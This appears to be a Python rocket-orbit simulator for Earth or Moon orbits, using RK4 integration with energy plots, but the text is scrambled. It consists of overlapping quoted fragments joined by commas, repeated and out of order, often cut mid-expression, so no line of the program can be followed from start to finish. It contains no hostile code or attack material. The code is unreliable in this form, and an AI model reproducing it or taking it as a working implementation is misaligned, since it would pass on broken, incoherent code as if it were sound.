ax2.plot(t,Ek, label = 'Kinetic", "= input(\"Vx = \") vy0 = input(\"Vy = \") print(''' Calculating orbit... ''')", "0.5) k3vy = F4(x[i] + h * k2x * 0.5, y[i] + h", "input(\"Vx = \") vy0 = input(\"Vy = \") print(''' Calculating orbit... 
''') h", "ax2.set_xlabel('Time (s)') ax2.set_ylabel('Energy (J)') ax2.plot(t,Ek, label = 'Kinetic Energy', color = 'lime') ax2.plot(t,Ep,", "np.zeros(N), np.zeros(N) x[0] = x0 y[0] = y0 vx[0] = vx0 vy[0] =", "= 6.674e-11 Me = 5.972e24 #mass of the Earth (kg) rE = 6.371e6", "* (x-d) * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * x *", "Energy', color = 'lime') ax4.plot(t,Ep, label = 'Potential Energy', color = 'cyan') ax4.plot(t,Et,", "Moon\"\"\") choice = input() if choice == \"1\": # Starting Coordinates (x,y) print(\"\"\"", "k4vy) t[i+1] = t[i] + h r[i+1] = np.hypot(x[i+1],y[i+1]) v[i+1] = np.hypot(vx[i+1],vy[i+1]) #Energy", "2 * k3vx +k4vx) vy[i+1] = vy[i] + (h/6) * (k1vy + 2", "@author: Alex \"\"\" import numpy as np import matplotlib.pyplot as plt plt.style.use('dark_background') from", "(kg) rE = 6.371e6 #radius of earth (m) Mm = 7.348e22 #mass of", "F4(x[i],y[i]) #2 k2x = F1(vx[i] + h * 0.5 * k1vx) k2y =", "initial velocities along the x and y axis (units are in m/s) (If", "k3x + k4x) y[i+1] = y[i] + (h/6) * (k1y + 2 *", "Orbit of the Moon') ax3.set_xlabel('Horizontal displacement') ax3.set_ylabel('Vertical displacement') ax3.plot(x,y, color = 'red') ax3.set_xlim([-5*rE,+1.2*d])", "2 * k3y + k4y) vx[i+1] = vx[i] + (h/6) * (k1vx +", "Energy', color = '#F700FF') ax2.legend() plt.show() Exercise_4() if choice == \"2\": h =", "moon = plt.Circle([d,0], rM, color = 'white') ax3.add_artist(earth) ax3.add_artist(moon) fig4,ax4 = plt.subplots() ax4.set_title('Energy", "y coordinates compounded in a single position variable 'r' v = np.hypot(vx,vy) #", "= 0, y = 7500)\"\"\") vx0 = input(\"Vx = \") vy0 = input(\"Vy", "y[i] + h * k1y * 0.5) #3 k3x = F1(vx[i] + h", "of the Moon (kg) Mr = 5e3 #mass of the rocket (kg) rM", "starting with x = 7x10^6 and y = 0)\"\"\") x0 = input(\"x =", "Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] if min(r) <= rE :", "k1y = F2(vy[i]) k1vx = F5(x[i],y[i]) k1vy = F6(x[i],y[i]) #2 k2x = F1(vx[i]", "* 0.5, y[i] + h * k1y * 0.5) 
k2vy = F6(x[i] +", "rM, color = 'white') ax3.add_artist(earth) ax3.add_artist(moon) fig4,ax4 = plt.subplots() ax4.set_title('Energy analysis of Rocket", "1.737e6 #radius of the moon (m) d = 3.844e8 # Distance between Earth", "def F1(vx): return vx #dy/dt def F2(vy): return vy #dvx/dt def F3(x,y): return", "# Crash Test else: print(\"\"\" -------------------------- \"Successful Flight! --------------------------\"\"\") print(\"\"\" DATA\"\"\") apsides =", "ax3.add_artist(earth) ax3.add_artist(moon) fig4,ax4 = plt.subplots() ax4.set_title('Energy analysis of Rocket Orbit of the Moon')", "2020 @author: Alex \"\"\" import numpy as np import matplotlib.pyplot as plt plt.style.use('dark_background')", "print(\"\"\" Please enter initial velocities along the x and y axis (units are", "+ 2 * k3y + k4y) vx[i+1] = vx[i] + (h/6) * (k1vx", "= 50 N=int(t1-t0/h) x, y, vx, vy, Ek, Ep, Et, t = np.zeros(N),", "displacement') ax3.set_ylabel('Vertical displacement') ax3.plot(x,y, color = 'red') ax3.set_xlim([-5*rE,+1.2*d]) ax3.set_ylim([-0.5*d,+0.5*d]) earth = plt.Circle([0,0], rE,", "ax2.plot(t,Et, label = 'Total Energy', color = '#F700FF') ax2.legend() plt.show() Exercise_4() if choice", "= \") vy0 = input(\"Vy = \") print(''' Calculating orbit... 
''') x[0] =", "F3(x[i],y[i]) k1vy = F4(x[i],y[i]) #2 k2x = F1(vx[i] + h * 0.5 *", "np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) print(\"\"\" Please enter initial coordinates for", "Exercise_4(): t0 = 0 t1 = 1.85e4 print(\"\"\" Welcome to Alex's Rocket Orbit", "Ep[0] = -Me*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total energy is", "range (0, N-1): #1 k1x = F1(vx[i]) k1y = F2(vy[i]) k1vx = F3(x[i],y[i])", "position variable 'r' v = np.hypot(vx,vy) # Velocities in the x and y", "k1y = F2(vy[i]) k1vx = F3(x[i],y[i]) k1vy = F4(x[i],y[i]) #2 k2x = F1(vx[i]", "+ h * k3x, y[i] + h * k3y) x[i+1] = x[i] +", "'red') ax3.set_xlim([-5*rE,+1.2*d]) ax3.set_ylim([-0.5*d,+0.5*d]) earth = plt.Circle([0,0], rE, color = 'teal') moon = plt.Circle([d,0],", "F5(x[i],y[i]) k1vy = F6(x[i],y[i]) #2 k2x = F1(vx[i] + h * 0.5 *", "* (Me * y * G) / (((x**2)+(y**2))**(3/2)) #dvx/dt including influence of the", "def Exercise_4(): t0 = 0 t1 = 1.85e4 print(\"\"\" Welcome to Alex's Rocket", "(h/6) * (k1vx + 2 * k2vx + 2 * k3vx +k4vx) vy[i+1]", "h * k2y * 0.5) k3vy = F6(x[i] + h * k2x *", "k3vy) k4vx = F5(x[i] + h * k3x, y[i] + h * k3y)", "5.972e24 #mass of the Earth (kg) rE = 6.371e6 #radius of earth (m)", "Velocities (x,y) print(\"\"\" Please enter initial velocities along the x and y axis\"\"\")", "+ h * k3vx) k4y = F2(vy[i] + h * k3vy) k4vx =", "Coordinates (x,y) print(\"\"\" Please enter initial coordinates for your rocket (units are in", "plt.subplots() ax4.set_title('Energy analysis of Rocket Orbit of the Moon') ax4.set_xlabel('Time (s)') ax4.set_ylabel('Energy (J)')", "rocket (units are in m): (I reccommend starting with x = 7x10^6 and", "= F2(vy[i]) k1vx = F3(x[i],y[i]) k1vy = F4(x[i],y[i]) #2 k2x = F1(vx[i] +", "k2x * 0.5, y[i] + h * k2y * 0.5) #4 k4x =", "0)\"\"\") x0 = input(\"x = \") y0 = input(\"y = \") # Starting", "= plt.Circle([0,0], rE, color = 'teal') ax1.add_artist(earth) ax1.set_xlim([-2*rE,+2*rE]) 
ax1.set_ylim([-2*rE,+2*rE]) fig2,ax2 = plt.subplots() ax2.set_title('Energy", "= F3(x[i],y[i]) k1vy = F4(x[i],y[i]) #2 k2x = F1(vx[i] + h * 0.5", "y = 7500)\"\"\") vx0 = input(\"Vx = \") vy0 = input(\"Vy = \")", "0.5, y[i] + h * k1y * 0.5) k2vy = F4(x[i] + h", "k1vy = F4(x[i],y[i]) #2 k2x = F1(vx[i] + h * 0.5 * k1vx)", "orbiting Earth') ax2.set_xlabel('Time (s)') ax2.set_ylabel('Energy (J)') ax2.plot(t,Ek, label = 'Kinetic Energy', color =", "ax2.set_ylabel('Energy (J)') ax2.plot(t,Ek, label = 'Kinetic Energy', color = 'lime') ax2.plot(t,Ep, label =", "and the Moon (m) #dx/dt def F1(vx): return vx #dy/dt def F2(vy): return", "input(\"x = \") y0 = input(\"y = \") # Starting Velocities (x,y) print(\"\"\"", "* 0.5 * k1vy) k2vx = F5(x[i] + h * k1x * 0.5,", "+ 2 * k2vy + 2 * k3vy + k4vy) t[i+1] = t[i]", "== \"2\": h = 50 N=int(t1-t0/h) x, y, vx, vy, Ek, Ep, Et,", "G) / (((x**2)+(y**2))**(3/2)) #dvx/dt including influence of the Moon def F5(x,y): return (-1*(Mm", "RK4 Implementation for i in range (0, N-1): #1 k1x = F1(vx[i]) k1y", "y[0] = y0 vx[0] = vx0 vy[0] = vy0 r = np.hypot(x,y) #", "h * k1y * 0.5) #3 k3x = F1(vx[i] + h * 0.5", "'r' v = np.hypot(vx,vy) # Velocities in the x and y directions compounded", "to Alex's Rocket Orbit Simulator! Please select which body you wish your rocket", "+ h * k3y) k4vy = F4(x[i] + h * k3x, y[i] +", "(-GMm/r) Et[0] = Ek[0]+Ep[0] #Total energy is the sum of these two #", "-*- coding: utf-8 -*- \"\"\" Created on Wed Mar 4 10:37:05 2020 @author:", "\") print(''' Calculating orbit... 
''') h = 1 N=int(t1-t0/h) x, y, vx, vy,", "+ h * k1y * 0.5) #3 k3x = F1(vx[i] + h *", "F3(x[i] + h * k2x * 0.5, y[i] + h * k2y *", "k2vy = F6(x[i] + h * k1x * 0.5, y[i] + h *", "i+1 iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] if min(r) <=", "k2x + 2 * k3x + k4x) y[i+1] = y[i] + (h/6) *", "* k3x, y[i] + h * k3y) k4vy = F4(x[i] + h *", "'teal') ax1.add_artist(earth) ax1.set_xlim([-2*rE,+2*rE]) ax1.set_ylim([-2*rE,+2*rE]) fig2,ax2 = plt.subplots() ax2.set_title('Energy analysis of a rocket orbiting", "F3(x[i] + h * k3x, y[i] + h * k3y) k4vy = F4(x[i]", "of the Moon') ax4.set_xlabel('Time (s)') ax4.set_ylabel('Energy (J)') ax4.plot(t,Ek, label = 'Kinetic Energy', color", "moon (m) d = 3.844e8 # Distance between Earth and the Moon (m)", "k1x = F1(vx[i]) k1y = F2(vy[i]) k1vx = F5(x[i],y[i]) k1vy = F6(x[i],y[i]) #2", "= 5e3 #mass of the rocket (kg) rM = 1.737e6 #radius of the", "= np.hypot(x[i+1],y[i+1]) v[i+1] = np.hypot(vx[i+1],vy[i+1]) #Energy Ek[i+1] = 0.5*Mr*(v[i+1]**2) # Ek, Ep and", "= (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] param = PrettyTable(['Min. 
Altitude above Earth", "choice == \"1\": # Starting Coordinates (x,y) print(\"\"\" Please enter initial coordinates for", "t0 = 0 t1 = 1.85e4 print(\"\"\" Welcome to Alex's Rocket Orbit Simulator!", "/ (((x**2)+(y**2))**(3/2)) #dvy/dt def F4(x,y): return -1 * (Me * y * G)", "Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Me*Mr*G/r[0] #Gravitational potential energy (-GMm/r)", "#!/usr/bin/env python3 # -*- coding: utf-8 -*- \"\"\" Created on Wed Mar 4", "#dy/dt def F2(vy): return vy #dvx/dt def F3(x,y): return -1 * (Me *", "F1(vx[i]) k1y = F2(vy[i]) k1vx = F5(x[i],y[i]) k1vy = F6(x[i],y[i]) #2 k2x =", "= np.hypot(vx[0],vy[0]) #Energy Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] = -Mm*Mr*G/r[0] #Gravitational", "= F2(vy[i] + h * 0.5 * k2vy) k3vx = F3(x[i] + h", "input() if choice == \"1\": # Starting Coordinates (x,y) print(\"\"\" Please enter initial", "* k1vx) k2y = F2(vy[i] + h * 0.5 * k1vy) k2vx =", "+ h * 0.5 * k2vy) k3vx = F3(x[i] + h * k2x", "(Me * x * G) / (((x**2)+(y**2))**(3/2)) #dvy/dt def F4(x,y): return -1 *", "of these two # Part B RK4 Implementation for i in range (0,", "(m)','Min. 
Altitude above Moon (m)']) param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),]) print(param) fig3,ax3 = plt.subplots() ax3.set_title('Rocket Orbit of", "k2x = F1(vx[i] + h * 0.5 * k1vx) k2y = F2(vy[i] +", "color = 'red') ax1.axis('equal') earth = plt.Circle([0,0], rE, color = 'teal') ax1.add_artist(earth) ax1.set_xlim([-2*rE,+2*rE])", "Earth') ax2.set_xlabel('Time (s)') ax2.set_ylabel('Energy (J)') ax2.plot(t,Ek, label = 'Kinetic Energy', color = 'lime')", "* k3vy) k4vx = F3(x[i] + h * k3x, y[i] + h *", "/ (((x**2)+(y**2))**(3/2)) #dvx/dt including influence of the Moon def F5(x,y): return (-1*(Mm *", "k3vx) k4y = F2(vy[i] + h * k3vy) k4vx = F5(x[i] + h", "enter initial coordinates for your rocket (units are in m): (I reccommend starting", "Earth') ax1.set_xlabel('x position (m)') ax1.set_ylabel('y position (m)') ax1.plot(x,y, color = 'red') ax1.axis('equal') earth", "+ h * 0.5 * k1vy) k2vx = F3(x[i] + h * k1x", "a rocket orbiting Earth') ax2.set_xlabel('Time (s)') ax2.set_ylabel('Energy (J)') ax2.plot(t,Ek, label = 'Kinetic Energy',", "Ep, Et = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) x[0] =", "Energy', color = 'lime') ax2.plot(t,Ep, label = 'Potential Energy', color = 'cyan') ax2.plot(t,Et,", "(h/6) * (k1y + 2 * k2y + 2 * k3y + k4y)", "y, vx, vy, Ek, Ep, Et, t = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N),", "two # Part B RK4 Implementation for i in range (0, N-1): #1", "F6(x[i],y[i]) #2 k2x = F1(vx[i] + h * 0.5 * k1vx) k2y =", "= plt.Circle([0,0], rE, color = 'teal') moon = plt.Circle([d,0], rM, color = 'white')", "x and y axis\"\"\") vx0 = input(\"Vx = \") vy0 = input(\"Vy =", "vy0 = input(\"Vy = \") print(''' Calculating orbit... 
''') h = 1 N=int(t1-t0/h)", "rocket:\"\"\") x0 = input(\"x = \") y0 = input(\"y = \") # Starting", "0.5, y[i] + h * k1y * 0.5) #3 k3x = F1(vx[i] +", "k4vx = F5(x[i] + h * k3x, y[i] + h * k3y) k4vy", "= 'white') ax3.add_artist(earth) ax3.add_artist(moon) fig4,ax4 = plt.subplots() ax4.set_title('Energy analysis of Rocket Orbit of", "F4(x,y): return -1 * (Me * y * G) / (((x**2)+(y**2))**(3/2)) #dvx/dt including", "#dvx/dt including influence of the Moon def F5(x,y): return (-1*(Mm * (x-d) *", "= np.hypot(vx,vy) # Velocities in the x and y directions compounded in single", "G) / (((x**2)+(y**2))**(3/2))) #dvy/dt including influence of the Moon def F6(x,y): return (-1*(Mm", "DATA\"\"\") apsides = PrettyTable(['Min. Altitude (m)','Periapsis (m)','Apoapsis (m)']) apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))]) print(apsides) #Plotting fig1,ax1 =", "= np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) print(\"\"\" Please enter initial", "= 6.371e6 #radius of earth (m) Mm = 7.348e22 #mass of the Moon", "x[i+1] = x[i] + (h/6) * (k1x + 2 * k2x + 2", "energy (1/2MV**2) Ep[0] = -Mm*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total", "\") y0 = input(\"y = \") # Starting Velocities (x,y) print(\"\"\" Please enter", "'#F700FF') ax2.legend() plt.show() Exercise_4() if choice == \"2\": h = 50 N=int(t1-t0/h) x,", "-Mm*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total energy is the sum", "ax3.set_ylabel('Vertical displacement') ax3.plot(x,y, color = 'red') ax3.set_xlim([-5*rE,+1.2*d]) ax3.set_ylim([-0.5*d,+0.5*d]) earth = plt.Circle([0,0], rE, color", "= 7.348e22 #mass of the Moon (kg) Mr = 5e3 #mass of the", "== \"1\": # Starting Coordinates (x,y) print(\"\"\" Please enter initial coordinates for your", "the previously reccommended altitude is set then start with x = 0, y", "x and y directions compounded in single variable 'v' r[0] = 
np.hypot(x[0],y[0]) v[0]", "Altitude above Moon (m)']) param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),]) print(param) fig3,ax3 = plt.subplots() ax3.set_title('Rocket Orbit of the", "* x * G) / (((x**2)+(y**2))**(3/2)) #dvy/dt def F4(x,y): return -1 * (Me", "((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * x * G) / (((x**2)+(y**2))**(3/2))) #dvy/dt including", "0.5) k2vy = F4(x[i] + h * k1x * 0.5, y[i] + h", "analysis of Rocket Orbit of the Moon') ax4.set_xlabel('Time (s)') ax4.set_ylabel('Energy (J)') ax4.plot(t,Ek, label", "as np import matplotlib.pyplot as plt plt.style.use('dark_background') from prettytable import PrettyTable G =", "return (-1*(Mm * y * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me *", "# Starting Coordinates (x,y) print(\"\"\" Please enter initial coordinates for your rocket (units", "* 0.5, y[i] + h * k2y * 0.5) #4 k4x = F1(vx[i]", "3.844e8 # Distance between Earth and the Moon (m) #dx/dt def F1(vx): return", "+ h * k3x, y[i] + h * k3y) k4vy = F4(x[i] +", "(If the previously reccommended altitude is set then start with x = 0,", "* G) / (((x**2)+(y**2))**(3/2))) def Exercise_4(): t0 = 0 t1 = 1.85e4 print(\"\"\"", "previously reccommended altitude is set then start with x = 0, y =", "iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] if min(r) <= rE", ": print(\"\"\" \"Your rocket has crashed!\"\"\") # Crash Test else: print(\"\"\" -------------------------- \"Successful", "(m)') ax1.plot(x,y, color = 'red') ax1.axis('equal') earth = plt.Circle([0,0], rE, color = 'teal')", "label = 'Total Energy', color = '#F700FF') ax2.legend() plt.show() Exercise_4() if choice ==", "= F5(x[i],y[i]) k1vy = F6(x[i],y[i]) #2 k2x = F1(vx[i] + h * 0.5", "Ep and total energy of the rocket for i+1 iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1]", "if min(r) <= rE : print(\"\"\" \"Your rocket has crashed!\"\"\") # Crash Test", "color = 'lime') ax2.plot(t,Ep, label = 'Potential Energy', color = 'cyan') ax2.plot(t,Et, label", "F1(vx[i] + 
h * k3vx) k4y = F2(vy[i] + h * k3vy) k4vx", "Ek, Ep and total energy of the rocket for i+1 iterations Ep[i+1] =", "rocket has crashed!\"\"\") # Crash Test else: print(\"\"\" -------------------------- \"Successful Flight! --------------------------\"\"\") print(\"\"\"", "k4x) y[i+1] = y[i] + (h/6) * (k1y + 2 * k2y +", "ax2.plot(t,Ep, label = 'Potential Energy', color = 'cyan') ax2.plot(t,Et, label = 'Total Energy',", "along the x and y axis\"\"\") vx0 = input(\"Vx = \") vy0 =", "y[i+1] = y[i] + (h/6) * (k1y + 2 * k2y + 2", "= \") print(''' Calculating orbit... ''') x[0] = x0 y[0] = y0 vx[0]", "PrettyTable(['Min. Altitude (m)','Periapsis (m)','Apoapsis (m)']) apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))]) print(apsides) #Plotting fig1,ax1 = plt.subplots() ax1.set_title('Rocket orbit", "of the moon (m) d = 3.844e8 # Distance between Earth and the", "np.zeros(N) x[0] = x0 y[0] = y0 vx[0] = vx0 vy[0] = vy0", "* k2y * 0.5) k3vy = F4(x[i] + h * k2x * 0.5,", "else: print(\"\"\" -------------------------- \"Successful Flight! --------------------------\"\"\") print(\"\"\" DATA\"\"\") apsides = PrettyTable(['Min. Altitude (m)','Periapsis", "k1vy) k2vx = F3(x[i] + h * k1x * 0.5, y[i] + h", "#Total energy is the sum of these two # Part A RK4 Implementation", "1. Earth \\n 2. 
Moon\"\"\") choice = input() if choice == \"1\": #", "min(r) <= rE : print(\"\"\" \"Your rocket has crashed!\"\"\") # Crash Test else:", "Created on Wed Mar 4 10:37:05 2020 @author: Alex \"\"\" import numpy as", "directions compounded in single variable 'v' r[0] = np.hypot(x[0],y[0]) v[0] = np.hypot(vx[0],vy[0]) #Energy", "compounded in single variable 'v' r[0] = np.hypot(x[0],y[0]) v[0] = np.hypot(vx[0],vy[0]) #Energy Ek[0]", "initial coordinates for your rocket (units are in m): (I reccommend starting with", "+ h * k2y * 0.5) #4 k4x = F1(vx[i] + h *", "Please enter initial coordinates for your rocket:\"\"\") x0 = input(\"x = \") y0", "print(\"\"\" Welcome to Alex's Rocket Orbit Simulator! Please select which body you wish", "wish your rocket to orbit (enter 1 or 2): \\n 1. Earth \\n", "+ h * k2y * 0.5) k3vy = F4(x[i] + h * k2x", "= 'red') ax1.axis('equal') earth = plt.Circle([0,0], rE, color = 'teal') ax1.add_artist(earth) ax1.set_xlim([-2*rE,+2*rE]) ax1.set_ylim([-2*rE,+2*rE])", "(-1*(Mm * y * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * y", "energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total energy is the sum of these two", "F2(vy[i] + h * k3vy) k4vx = F5(x[i] + h * k3x, y[i]", "on Wed Mar 4 10:37:05 2020 @author: Alex \"\"\" import numpy as np", "coordinates for your rocket (units are in m): (I reccommend starting with x", "k2y = F2(vy[i] + h * 0.5 * k1vy) k2vx = F3(x[i] +", "the x and y axis (units are in m/s) (If the previously reccommended", "print(apsides) #Plotting fig1,ax1 = plt.subplots() ax1.set_title('Rocket orbit of Earth') ax1.set_xlabel('x position (m)') ax1.set_ylabel('y", "the Moon (kg) Mr = 5e3 #mass of the rocket (kg) rM =", "#4 k4x = F1(vx[i] + h * k3vx) k4y = F2(vy[i] + h", "matplotlib.pyplot as plt plt.style.use('dark_background') from prettytable import PrettyTable G = 6.674e-11 Me =", "y[i] + h * k2y * 0.5) #4 k4x = F1(vx[i] + h", "x0 = input(\"x = \") y0 = input(\"y = \") # Starting Velocities", "0.5 * k1vy) k2vx = F3(x[i] + h * k1x * 0.5, 
y[i]", "y[i] + h * k2y * 0.5) k3vy = F4(x[i] + h *", "* y * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * y *", "for i+1 iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] + Ep[i+1] if min(r)", "F5(x,y): return (-1*(Mm * (x-d) * G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me", "influence of the Moon def F6(x,y): return (-1*(Mm * y * G) /", "2. Moon\"\"\") choice = input() if choice == \"1\": # Starting Coordinates (x,y)", "\") vy0 = input(\"Vy = \") print(''' Calculating orbit... ''') h = 1", "y[i] + h * k2y * 0.5) k3vy = F6(x[i] + h *", "y0 vx[0] = vx0 vy[0] = vy0 t[0] = 0 r = np.hypot(x,y)", "(k1y + 2 * k2y + 2 * k3y + k4y) vx[i+1] =", "Moon (kg) Mr = 5e3 #mass of the rocket (kg) rM = 1.737e6", "2 * k2vy + 2 * k3vy + k4vy) t[i+1] = t[i] +", "= 'Potential Energy', color = 'cyan') ax2.plot(t,Et, label = 'Total Energy', color =", "then start with x = 0, y = 7500)\"\"\") vx0 = input(\"Vx =", "vy, t, Ek, Ep, Et = np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N),", "def F2(vy): return vy #dvx/dt def F3(x,y): return -1 * (Me * x", "plt.Circle([d,0], rM, color = 'white') ax3.add_artist(earth) ax3.add_artist(moon) fig4,ax4 = plt.subplots() ax4.set_title('Energy analysis of", "\"Successful Flight! --------------------------\"\"\") print(\"\"\" DATA\"\"\") apsides = PrettyTable(['Min. 
Altitude (m)','Periapsis (m)','Apoapsis (m)']) apsides.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(r)),'{:.3}'.format(max(r))])", "= 7500)\"\"\") vx0 = input(\"Vx = \") vy0 = input(\"Vy = \") print('''", "ax3.set_xlim([-5*rE,+1.2*d]) ax3.set_ylim([-0.5*d,+0.5*d]) earth = plt.Circle([0,0], rE, color = 'teal') moon = plt.Circle([d,0], rM,", "np import matplotlib.pyplot as plt plt.style.use('dark_background') from prettytable import PrettyTable G = 6.674e-11", "k2x * 0.5, y[i] + h * k2y * 0.5) k3vy = F4(x[i]", "'white') ax3.add_artist(earth) ax3.add_artist(moon) fig4,ax4 = plt.subplots() ax4.set_title('Energy analysis of Rocket Orbit of the", "ax3.set_ylim([-0.5*d,+0.5*d]) earth = plt.Circle([0,0], rE, color = 'teal') moon = plt.Circle([d,0], rM, color", "10:37:05 2020 @author: Alex \"\"\" import numpy as np import matplotlib.pyplot as plt", "energy (1/2MV**2) Ep[0] = -Me*Mr*G/r[0] #Gravitational potential energy (-GMm/r) Et[0] = Ek[0]+Ep[0] #Total", "Earth and the Moon (m) #dx/dt def F1(vx): return vx #dy/dt def F2(vy):", "np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) x[0] = x0 y[0] = y0", "def F3(x,y): return -1 * (Me * x * G) / (((x**2)+(y**2))**(3/2)) #dvy/dt", "k2vy) k3vx = F5(x[i] + h * k2x * 0.5, y[i] + h", "F6(x[i] + h * k1x * 0.5, y[i] + h * k1y *", "or 2): \\n 1. Earth \\n 2. 
Moon\"\"\") choice = input() if choice", "prettytable import PrettyTable G = 6.674e-11 Me = 5.972e24 #mass of the Earth", "+ 2 * k2x + 2 * k3x + k4x) y[i+1] = y[i]", "= F2(vy[i]) k1vx = F5(x[i],y[i]) k1vy = F6(x[i],y[i]) #2 k2x = F1(vx[i] +", "* 0.5, y[i] + h * k1y * 0.5) #3 k3x = F1(vx[i]", "variable 'r' v = np.hypot(vx,vy) # Velocities in the x and y directions", "np.hypot(x[0],y[0]) v[0] = np.hypot(vx[0],vy[0]) #Energy Ek[0] = Mr*(v[0]**2)/2 #Kinetic energy (1/2MV**2) Ep[0] =", "* k3y) k4vy = F4(x[i] + h * k3x, y[i] + h *", "of Earth') ax1.set_xlabel('x position (m)') ax1.set_ylabel('y position (m)') ax1.plot(x,y, color = 'red') ax1.axis('equal')", "* k3x, y[i] + h * k3y) x[i+1] = x[i] + (h/6) *", "* k2vx + 2 * k3vx +k4vx) vy[i+1] = vy[i] + (h/6) *", "ax4.set_ylabel('Energy (J)') ax4.plot(t,Ek, label = 'Kinetic Energy', color = 'lime') ax4.plot(t,Ep, label =", "+ k4y) vx[i+1] = vx[i] + (h/6) * (k1vx + 2 * k2vx", "+ (h/6) * (k1vx + 2 * k2vx + 2 * k3vx +k4vx)", "* 0.5, y[i] + h * k2y * 0.5) k3vy = F4(x[i] +", "* G) / ((((x-d)**2)+(y**2))**(3/2))) + (-1 * (Me * y * G) /", "and y coordinates compounded in a single position variable 'r' v = np.hypot(vx,vy)", "k1vx = F3(x[i],y[i]) k1vy = F4(x[i],y[i]) #2 k2x = F1(vx[i] + h *", "y[i] + h * k3y) k4vy = F4(x[i] + h * k3x, y[i]", "ax1.plot(x,y, color = 'red') ax1.axis('equal') earth = plt.Circle([0,0], rE, color = 'teal') ax1.add_artist(earth)", "label = 'Potential Energy', color = 'cyan') ax2.plot(t,Et, label = 'Total Energy', color", "= Ek[i+1] + Ep[i+1] param = PrettyTable(['Min. Altitude above Earth (m)','Min. Altitude above", "above Earth (m)','Min. Altitude above Moon (m)']) param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),]) print(param) fig3,ax3 = plt.subplots() ax3.set_title('Rocket", "1 or 2): \\n 1. Earth \\n 2. 
Moon\"\"\") choice = input() if", "enter initial velocities along the x and y axis (units are in m/s)", "* k1vy) k2vx = F3(x[i] + h * k1x * 0.5, y[i] +", "# Ek, Ep and total energy of the rocket for i+1 iterations Ep[i+1]", "of the rocket for i+1 iterations Ep[i+1] = (-1*Mr*Me*G)/r[i+1] Et[i+1] = Ek[i+1] +", "(((x**2)+(y**2))**(3/2))) #dvy/dt including influence of the Moon def F6(x,y): return (-1*(Mm * y", "h * k2x * 0.5, y[i] + h * k2y * 0.5) #4", "= x[i] + (h/6) * (k1x + 2 * k2x + 2 *", "(m)']) param.add_row(['{:.3}'.format(min(r)-rE),'{:.3}'.format(min(abs(d-r))),]) print(param) fig3,ax3 = plt.subplots() ax3.set_title('Rocket Orbit of the Moon') ax3.set_xlabel('Horizontal displacement')", "F2(vy[i]) k1vx = F3(x[i],y[i]) k1vy = F4(x[i],y[i]) #2 k2x = F1(vx[i] + h", "Calculating orbit... ''') h = 1 N=int(t1-t0/h) x, y, vx, vy, t, Ek,", "y[i] + h * k3y) k4vy = F6(x[i] + h * k3x, y[i]", "np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N), np.zeros(N) x[0] = x0 y[0] = y0 vx[0]", "coordinates for your rocket:\"\"\") x0 = input(\"x = \") y0 = input(\"y =", "orbit (enter 1 or 2): \\n 1. Earth \\n 2. Moon\"\"\") choice =", "(k1vy + 2 * k2vy + 2 * k3vy + k4vy) t[i+1] =", "'teal') moon = plt.Circle([d,0], rM, color = 'white') ax3.add_artist(earth) ax3.add_artist(moon) fig4,ax4 = plt.subplots()", "+ (-1 * (Me * x * G) / (((x**2)+(y**2))**(3/2))) #dvy/dt including influence", "these two # Part A RK4 Implementation for i in range (0, N-1):", "Welcome to Alex's Rocket Orbit Simulator! 
